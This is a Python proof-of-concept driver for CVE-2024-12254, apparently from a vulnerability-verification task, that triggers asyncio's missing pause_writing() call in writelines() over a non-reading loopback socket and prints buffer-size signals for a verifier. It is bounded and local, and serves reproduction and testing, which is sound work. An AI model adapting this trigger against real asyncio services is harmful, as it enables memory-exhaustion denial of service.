#!/usr/bin/env python3
"""CVE-2024-12254 PoC driver.

Drives a real asyncio _SelectorSocketTransport (the affected SelectorEventLoop
path) over a loopback socket whose peer NEVER reads. With a low high-water mark
set, a single bounded transport.writelines() call queues data past the
high-water mark and leaves self._buffer non-empty, which makes writelines() take
the vulnerable branch:

    if self._buffer:
        self._loop._add_writer(self._sock_fd, self._write_ready)
        # <-- patched 3.12.9 adds self._maybe_pause_protocol() HERE; 3.12.8 omits it

On the vulnerable interpreter pause_writing() is therefore never called, even
though get_write_buffer_size() >= high_water. On a fixed interpreter the same
workload fires pause_writing() exactly once.

This script only DRIVES the transport and reports the two flow-control signals
that the verifier's harness inspects:
  - the transport write-buffer size (transport.get_write_buffer_size())
  - whether the verifier-owned Protocol.pause_writing hook fired

It does not assert success; the verifier decides by reading the resulting state.
"""
import asyncio
import socket
import sys


class FlowControlProtocol(asyncio.Protocol):
    """Protocol whose flow-control hooks are the observed signals."""

    def __init__(self):
        self.transport = None
        self.pause_writing_calls = 0
        self.resume_writing_calls = 0

    def connection_made(self, transport):
        self.transport = transport

    def pause_writing(self):
        self.pause_writing_calls += 1

    def resume_writing(self):
        self.resume_writing_calls += 1


async def drive(high_water, low_water, chunk_size, num_chunks):
    loop = asyncio.get_running_loop()

    # Build a connected loopback socket pair. rsock is the peer; we NEVER read
    # from it, so the kernel send buffer on wsock fills and the transport's
    # internal Python buffer accumulates -> writelines() leaves _buffer non-empty.
    rsock, wsock = socket.socketpair()
    rsock.setblocking(False)
    wsock.setblocking(False)

    # Shrink the kernel send buffer so the OS backpressure kicks in quickly with
    # a small, bounded workload (no real-RAM exhaustion needed).
    try:
        wsock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 4096)
        rsock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 4096)
    except OSError:
        pass

    protocol = FlowControlProtocol()
    transport, _ = await loop.connect_accepted_socket(
        lambda: protocol, wsock
    )

    # Force a low high-water mark, matching the upstream regression test, so the
    # crossing is deterministic and bounded.
    transport.set_write_buffer_limits(high=high_water, low=low_water)

    # Confirm we are exercising the affected transport/loop.
    print("python_version", ".".join(map(str, sys.version_info[:3])))
    print("loop_type", type(loop).__name__)
    print("transport_type", type(transport).__name__)
    print("high_water", transport.get_write_buffer_limits()[1])

    chunk = b"X" * chunk_size
    payload = [chunk] * num_chunks

    # The vulnerable call. After this, on 3.12.8 the buffer is non-empty and the
    # write handler is registered, but pause_writing() was never invoked.
    transport.writelines(payload)

    buf_size = transport.get_write_buffer_size()
    print("write_buffer_size", buf_size)
    print("pause_writing_calls", protocol.pause_writing_calls)
    print("resume_writing_calls", protocol.resume_writing_calls)
    print(
        "buffer_exceeds_high_water",
        buf_size > transport.get_write_buffer_limits()[1],
    )

    # Leave the objects intact for any verifier instrumentation, then close.
    transport.abort()
    rsock.close()


def main():
    # Defaults match a bounded, deterministic crossing; overridable via argv.
    high_water = int(sys.argv[1]) if len(sys.argv) > 1 else 1024
    low_water = int(sys.argv[2]) if len(sys.argv) > 2 else 256
    chunk_size = int(sys.argv[3]) if len(sys.argv) > 3 else 65536
    num_chunks = int(sys.argv[4]) if len(sys.argv) > 4 else 64
    asyncio.run(drive(high_water, low_water, chunk_size, num_chunks))


if __name__ == "__main__":
    main()
